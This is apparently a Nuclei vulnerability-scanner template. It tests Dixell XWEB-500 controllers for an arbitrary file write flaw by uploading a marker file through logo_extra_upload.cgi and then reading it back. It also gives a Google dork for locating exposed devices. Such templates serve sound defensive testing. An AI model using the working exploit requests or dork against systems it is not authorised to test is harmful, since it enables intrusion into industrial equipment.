id: dixell-xweb500-filewrite info: name: Dixell XWEB-500 - Arbitrary File Write author: hackerarpan severity: critical reference: - https://www.exploit-db.com/exploits/50639 metadata: google-dork: inurl:"xweb500.cgi" tags: lfw,iot,dixell,xweb500 requests: - raw: - | POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/octet-stream {{randstr}}.txt dixell-xweb500-filewrite - | GET /logo/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_2, "dixell-xweb500-filewrite")' - type: status status: - 200